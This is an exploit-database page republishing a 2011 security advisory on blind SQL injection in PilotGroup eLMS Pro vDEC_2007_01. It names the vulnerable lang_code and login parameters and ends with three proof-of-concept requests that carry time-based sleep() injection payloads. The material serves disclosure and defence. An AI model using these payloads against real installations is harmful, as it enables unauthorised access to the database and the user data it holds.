header-logo
Suggest Exploit
vendor:
eLMS Pro
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Multiple Blind SQL Injection
89
CWE
Product Name: eLMS Pro
Affected Version From: DEC_2007_01
Affected Version To: DEC_2007_01
Patch Exists: NO
Related CWE: N/A
CPE: a:pilotgroup:elms_pro:dec_2007_01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (EN), Apache 1.3.27 (Win32), PHP 5.2.4, MySQL 14.14 Distrib 5.1.43 (Win32-ia32)
2011

PG eLMS Pro vDEC_2007_01 Multiple Blind SQL Injection Vulnerabilities

Input passed via the 'lang_code' GET parameter to index.php and login.php in '/www/core/language.class.php', and 'login' POST parameter to login.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.
Source

Exploit-DB raw data:

PG eLMS Pro vDEC_2007_01 Multiple Blind SQL Injection Vulnerabilities

Vendor: PilotGroup Ltd
Product web page: http://www.elmspro.com
Affected version: DEC_2007_01

Summary: eLMS Pro solution is an outstanding and yet simple Learning Management
system. Our product is designed for any education formations: from small distance
training companies up to big colleges and universities. The system allows to build
courses, import SCORM content, deploy online learning, manage users, communicate
with users, track training results, and more.

Desc: Input passed via the 'lang_code' GET parameter to index.php and login.php
in '/www/core/language.class.php', and 'login' POST parameter to login.php is
not properly sanitised before being used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 1.3.27 (Win32)
           PHP 5.2.4
           MySQL 14.14 Distrib 5.1.43 (Win32-ia32)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab


Advisory ID: ZSL-2011-5028
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5028.php



08.07.2011


--


- http://localhost:6450/index.php?lang_code=1'+and+sleep(5)%23 (get)
- http://localhost:6450/login.php?lang_code=1'+and+sleep(5)%23 (get)

- http://localhost:6450/login.php (post)

  login=r00t'+or+sleep(5)%23&password=t00t!